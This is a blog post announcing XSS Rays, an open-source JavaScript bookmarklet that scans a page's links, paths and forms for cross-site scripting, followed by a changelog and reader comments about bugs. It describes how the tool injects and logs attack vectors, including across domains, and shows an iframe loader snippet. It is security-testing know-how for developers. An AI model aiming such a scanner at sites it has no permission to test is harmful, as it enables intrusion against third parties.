XSS Rays

I’ve developed a new XSS scanner tool that’s written in Javascript called XSS Rays for Microsoft. They have given me permission to release the tool as open source which is awesome because it can be used for other open source applications. I recommend you use it as part of the web development process to make sure you’ve filtered XSS correctly on your application.

It works as a bookmarklet and scans any links, paths or forms on the target scanning page (even cross domain). You can add vectors to it quite easily and it includes some of the most common injections I’ve found on sites over the years. I’ve tested it on IE7/IE8 and Firefox but it could work in other browsers.

The advantage of the bookmarklet is that vectors can be customised for each browser and they are executed in the context of the browser, in IE8 standards mode were css expressions are disabled in IE8 the vector won’t be executed for example.

Hopefully there should be no false positives either because each vector is actually executed and it reported back as successful, in fact if there is a false positive it will be a bug in my code (lets hope not).

Technical details

The code works by creating connections to the target links/paths using iframes, each iframe is assign a name which is the url to return to on successful execution (the originating url). This allows cross domain links to be checked.

The vectors are stored in a simple object, each vector has the following properties:- input, name, browser, form, url, path (there’s a optional second input). Input is the XSS vector, the string “XSS” is used to replace with a logger or a poc url and is required by all vectors.

Name is just a meaningful name applied to the vector, browser supports ALL|FF|IE and helps to save time when testing specific browser vectors as XSS Rays will only target those versions for the vector.

Form, url, path allows you to disable the vector for scanning forms etc, supports TRUE|FALSE.

There are a few configuration properties supported:-
1. externalLog – Sends all executions to a external logger by default “http://127.0.0.1/XSS_Rays/logging/xss_logger.php”, the vector is encoded and sent to a get variable xss and can be easily customised to log in another language, each field is sent tab separated.
2. excludeURLS – allows you to exclude certain urls from the scan, the variable is a regular expression so remember to double escape special characters.
3. sameorigin – When enabled it should stay to the same site and not scan external links, this has not be tested fully yet.

There’s a interesting little hack for IE to enable the onload event of a dynamic iframe, I use the following code to create a specific IE loader:-

var ieLoader = "document.getElementById('"+'ray'+self.uniqueID+"').ieonload()";												
	if(self.isIE()) {
		try {
		  var iframe = document.createElement('<iframe name="'+location + '#xss'+'" onload="'+ieLoader+'">');
		} catch (e) {							
		   var iframe = document.createElement('iframe');
		}
	} else {
	   var iframe = document.createElement('iframe');
}			

Download & Instructions

Download here

1. You need to install a local web server like xampp:-

http://www.apachefriends.org/en/xampp.html

2. Once installed copy the XSS_Rays directory to your web server root xampp root is :- C:\xampp\htdocs\
3. Open the bookmarklet.html file in the helpers directory of XSS_Rays. Drag to your bookmarks toolbar on Firefox or on IE right click the link and click add to favorites (You might get a security warning in IE).
4. Find your web site that you wish to scan, click your bookmarklet. Then press CTRL+SHIFT+X which will now run XSS Rays on the target site.

Thanks

Big thanks to David Ross, Manuel Caballero and you (you know who you are) for testing and feedback. Thanks to Microsoft for supporting the development of XSS Rays.

Updates….

The latest version of XSS Rays is now online (0.5.0), it contains some speed improvements and bug fixes.

1. Fixed conflicts with form elements with the name action or submit was causing form posts not to be submitted. Thanks Mike W
2. Removed unneeded cleanup code now the IE onload works.
3. Added the ability to exclude certain field types and names from being XSS’d.
4. Fixed name vector to specify window.name which was causing conflicts with image elements.
5. Fixed and checked same origin code. Thanks to Arshan who gave me a kick up the backside :)
6. Removed keyboard shortcut and added a button instead.

New update 0.5.5

1. Fixed Firefox bug with same origin
2. Fixed form Post to allow field names with submit. Thanks Kuza55 for the awesome form post hack :)

35 Responses to “XSS Rays”

  1. RAYH4C writes:

    SO COOL !

    :)

  2. cosine writes:

    4. Find your web site that you wish to scan, click your bookmarklet. Then press CTRL+ALT+X which will now run XSS Rays on the target site.

    ———————–

    it should be ‘ctrl+shift+x’,not ‘ctrl+alt+x’?

  3. Gareth Heyes writes:

    @cosine

    Thanks! I’ve corrected the article

  4. Chris writes:

    unfortunately, some browsers use X as a menu shortcut, so ctrl+shift+x does not seem to work (tested it with IE8 & FF307) :(

  5. Gareth Heyes writes:

    @chris

    I can change the shortcut, any suggestions?

    * Don’t forget you must click the bookmarklet first to activate the shortcut

  6. Gareth Heyes writes:

    Marcin has pointed out if you wish to host XSS Rays at a different location other than 127.0.0.1 you need to do the following:-

    1. Edit the bookmarklet file to point to the correct address in XSS_Rays/helpers/bookmarklet.html
    2. Change the externalLog property in XSS_Rays.js to the new address.

    You can also run a custom logging script which stores the vectors to a database if required.

  7. FBatista writes:

    Does the CTRL+SHIFT+X shortcut works on a mac? i tried this but nothing happened (the mouse cursor just disappears until i move it again)

  8. Gareth Heyes writes:

    @FBatista

    Could be Apple+Shift+X, I’ll check it on the mac

  9. Mike W. writes:

    I don’t get it. Say if I have a simple form of 3 inputs. Shouldn’t the tool simulate the form submission with the payloads? All the tool does is appending the payload to the target urls, which gets back 404s. Am I missing something here?

  10. Gareth Heyes writes:

    @Mike W

    XSS Rays checks path injections and only works on certain web servers and configurations. If you don’t want it to check paths then switch it off in the js file. FYI XSS Rays scans paths, urls, forms and submits get/posts vectors.

  11. RFS writes:

    This would seem to be a natural fit to work with php-ids (http://php-ids.org/). As they contain a great list of filters, and probably have a comprehensive list of attack vectors that could be simulated by this tool

  12. Gareth Heyes writes:

    @RFS

    Yes any vectors can be included within the vectors array, so that would be no problem.

  13. Mike W. writes:

    @Gareth Heyes

    I played around a little more. What I found is that a single
    <input name=”submit” type=”submit”>
    will throw the tool off track. Here is the form I have
    <form action=”/somewhere” method=”post”>
    <input type=”text” name=”first”>
    <input name=”submit” type=”submit”>
    </form>
    I works if I delete the 2nd input.
    I took a look at the js file, there is a function to scan the form. Not sure why it can’t handle a submission button.

  14. Gareth Heyes writes:

    @Mike W

    Thanks I’ll look into that and have it fixed shortly. I suspect because the application is expecting a known value for the submit button it is failing to inject as all values are attack vectors.

  15. arshan writes:

    the “same site” thing is important for professional testers who want to make sure not to send attacks against 3rd party partners who may not like it.

    as soon as that’s tested and working let us know!

  16. Gareth Heyes writes:

    I’ll add graphs and reporting for all you professionals :P

    Not. :P

  17. miha pi writes:

    so does the javascript download have all the fixes?

  18. Gareth Heyes writes:

    @miha pi

    I’ve fixed the instructions and I’m currently working on some other fixes which should be released today thanks

  19. grosser writes:

    i like the idea but instaling some php into a server does not sound good to me.

    It would be really usable as e.g. app engine or something similar. Users just have to use the bookmarklet and do not have to install anything…

  20. Gareth Heyes writes:

    @grosser

    It doesn’t have to be a local server, you can install it anywhere and just modify the configuration. The logging can also be done in a database if you so wish.

  21. Gareth Heyes writes:

    XSS Rays has now been updated, thanks to everyone for the bug reports and suggestions.

  22. Gareth Heyes writes:

    Latest version is now 0.5.3

  23. Balaji D Loganathan writes:

    so nice.

  24. Gareth Heyes writes:

    Latest version is now 0.5.5

  25. HTD writes:

    Hi,

    i liked your article very much,
    and i would also like to point out another article on this blog ->
    XSS Phishing

    Thanks

  26. jagstyle writes:

    isnt the xss function call on Line 175 (scanLinks function) of XSS_RAYS.js missing the href parameter?

    observed:
    this.xss({pathname:location.pathname,search:location.search, type: ‘url’});//scan originating url

    expected:
    this.xss({href:location.href,pathname:location.pathname,search:location.search, type: ‘url’});//scan originating url

  27. Gareth Heyes writes:

    @jagstyle

    Nope this is intentional, I scan the path name of the url

  28. jagstyle writes:

    without it my test hangs at that point with the linkStatus field displaying “url: undefined”

  29. Gareth Heyes writes:

    @jagstyle

    Please can you tell me which browser you are using? It could be a bug in the way it gets the path

  30. jagstyle writes:

    Firefox 3.5.5

    I sent an email with full details. Hopefully it’s helpful.

  31. mindsparc writes:

    Can you please send the details for me too,
    it is not working for me

  32. Gareth Heyes writes:

    Working on a fix for this, there is a bug on firefox but the vectors are intentionally duplicated as there are path injections. A temporary workaround is either comment out the path injections or disable the path option in the vectors.

    I should have a fix soon when I get chance to look at the code.

  33. 3p1C writes:

    I can’t scan something except on 127.0.0.1 despite I changed the xss_rays.js and bookmarklet.php files. When scan start is clicked nothing happens.

  34. jyoti bajoria writes:

    Hi , i tried to use this tool , but nt able to activate. Clicked on the link in my favourites also & then pressed the combination of keys also as mentioned. Help me in giving detailed steps to start this.

  35. Gareth Heyes writes:

    @jyoti @3p1C

    I plan to update the XSS Rays code and release a new version which will hopefully make it more user friendly. In the meantime try editing the XSS_Rays.js file to execute automatically